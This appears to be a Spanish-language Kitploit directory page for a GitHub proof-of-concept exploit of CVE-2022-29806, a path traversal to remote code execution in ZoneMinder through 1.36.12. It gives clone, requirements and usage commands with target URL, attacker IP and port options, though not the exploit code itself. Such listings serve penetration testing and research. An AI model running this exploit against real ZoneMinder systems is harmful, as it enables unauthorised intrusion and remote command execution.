Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-29806 — ZoneMinder hasta 1.36.12 Escalada de privilegios de idioma (y RCE) - PoC Exploit | Kitploit
Herramientas/GitHubGitHub/sigm0n/cve-2022-29806
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubsigm0n/cve-2022-29806

CVE-2022-29806

ZoneMinder hasta 1.36.12 Escalada de privilegios de idioma (y RCE) - PoC Exploit

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-29806

ZoneMinder hasta 1.36.12 Escalada de privilegios de idioma (y RCE)

alt img

Descripción

Una vulnerabilidad de Path Traversal en el archivo de registro de depuración y la opción de idioma predeterminado en ZoneMinder versiones anteriores a 1.36.13 y 1.37.11 permite a los atacantes escribir y ejecutar código arbitrario para lograr la ejecución remota de comandos.

"La prueba de concepto fue probada contra ZoneMinder 1.36.4 en docker ubuntu18.04: ZoneMinder/zmdockerfiles, pero sigue siendo aplicable hasta la versión más reciente 1.36.12"

Uso

root@kitploit:~
git clone https://github.com/OP3R4T0R/CVE-2022-29806
cd CVE-2022-29806
python3 exploit.py
root@kitploit:~
python3 exploit.py -t <target_url> -ip <attacker_ip> -p <port>
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>

Requisitos

root@kitploit:~
pip3 install beautifulsoup4
pip3 install argparse
pip3 install requests

Créditos

krastanoel descubrió la vulnerabilidad.

Descargar herramienta